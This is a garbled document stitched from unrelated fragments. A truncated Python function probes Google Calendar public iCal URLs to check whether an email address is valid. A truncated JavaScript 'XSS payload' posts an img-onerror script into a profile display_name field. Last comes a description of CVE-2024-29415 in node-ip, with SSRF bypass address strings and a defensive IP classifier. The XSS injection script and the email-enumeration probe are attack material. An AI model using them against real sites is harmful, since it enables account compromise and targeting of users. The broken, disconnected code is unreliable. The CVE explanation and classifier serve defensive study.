import sys
import requests
from bs4 import BeautifulSoup

def check_calendar_url(email):
    url = f"https://calendar.google.com/calendar/ical/{email}/public/basic.ics"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("The email address is valid!")

<script>
// Crafty XSS payload
var maliciousPayload = "<img src=x onerror=alert('XSS Attack!') />";
// Send the payload through the display_name field
var xhr = new XMLHttpRequest();
xhr.open("POST", "/update_profile", true); // Replace "/update_profile" with the appropriate endpoint
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onreadystatechange = function() {
  if (xhr.readyState === XMLHttpRequest.DONE) {

CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public.

Vulnerability Description

The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include:

127.1
01200034567
012.1.2.3
000:0:0000::01
::fFFf:127.0.0.1
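
A defensive counterpart to the misclassification described above, as an added example that is not code from the original page or from the node-ip project: it canonicalizes the literal first and only then checks it against non-public ranges, returning "invalid" for anything it cannot parse. The function names (classify, parseIPv4, parseIPv6) are hypothetical, the blocked-range list is a small constructed subset, and it assumes the component that finally connects reads short, octal and hex IPv4 forms the way inet_aton does.

```javascript
// Added example (not node-ip code). Non-public IPv4 ranges as [first, last] addresses:
// 0/8, 10/8, 100.64/10, 127/8, 169.254/16, 172.16/12, 192.168/16 (a minimal, constructed set).
const V4_BLOCKED = [[0x00000000, 0x00ffffff], [0x0a000000, 0x0affffff], [0x64400000, 0x647fffff],
  [0x7f000000, 0x7fffffff], [0xa9fe0000, 0xa9feffff], [0xac100000, 0xac1fffff],
  [0xc0a80000, 0xc0a8ffff]];
const v4Blocked = (ip) => V4_BLOCKED.some(([lo, hi]) => ip >= lo && ip <= hi);

// inet_aton-style parse (assumed resolver behaviour): 1 to 4 parts, each decimal,
// 0-prefixed octal or 0x hex. Returns an unsigned 32-bit number, or null if not parseable.
function parseIPv4(s) {
  const nums = [];
  for (const p of s.split('.')) {
    if (/^0x[0-9a-f]+$/i.test(p)) nums.push(parseInt(p, 16));
    else if (/^0[0-7]*$/.test(p)) nums.push(parseInt(p, 8));
    else if (/^[1-9]\d*$/.test(p)) nums.push(parseInt(p, 10));
    else return null;
  }
  if (nums.length > 4) return null;
  const last = nums.pop(); // the final part fills all remaining bytes
  if (nums.some((n) => n > 255) || last >= 2 ** (8 * (4 - nums.length))) return null;
  return nums.reduce((acc, n, i) => acc + n * 2 ** (8 * (3 - i)), last);
}

// Expand an IPv6 literal to eight 16-bit groups; a dotted-quad tail becomes two groups.
function parseIPv6(s) {
  const dotted = s.match(/^(.*:)(\d+\.\d+\.\d+\.\d+)$/);
  const v4 = dotted ? parseIPv4(dotted[2]) : 0;
  if (v4 === null) return null;
  if (dotted) s = `${dotted[1]}${Math.floor(v4 / 65536).toString(16)}:${(v4 % 65536).toString(16)}`;
  const [head, tail, extra] = s.split('::').map((h) => (h ? h.split(':') : []));
  const fill = tail ? 8 - head.length - tail.length : 0;
  if (extra || fill < 0 || (tail && fill < 1)) return null;
  const all = [...head, ...Array(fill).fill('0'), ...(tail || [])];
  if (all.length !== 8 || !all.every((g) => /^[0-9a-f]{1,4}$/i.test(g))) return null;
  return all.map((g) => parseInt(g, 16));
}

// Returns 'public', 'non-public' or 'invalid'; a caller should connect only on 'public'.
function classify(host) {
  const verdict = (blocked) => (blocked ? 'non-public' : 'public');
  if (!host.includes(':')) {
    const ip = parseIPv4(host);
    return ip === null ? 'invalid' : verdict(v4Blocked(ip));
  }
  const g = parseIPv6(host);
  if (g === null) return 'invalid';
  const lead = g.findIndex((x) => x !== 0); // first non-zero group, -1 for "::"
  if (lead === 5 && g[5] === 0xffff) return verdict(v4Blocked(g[6] * 65536 + g[7])); // IPv4-mapped
  return verdict(lead === -1 || lead > 5 || (g[0] & 0xfe00) === 0xfc00 || (g[0] & 0xffc0) === 0xfe80);
}
```

All five strings listed above classify as non-public here, because each is reduced to its numeric address (for example 012.1.2.3 becomes 10.1.2.3) before the range check runs.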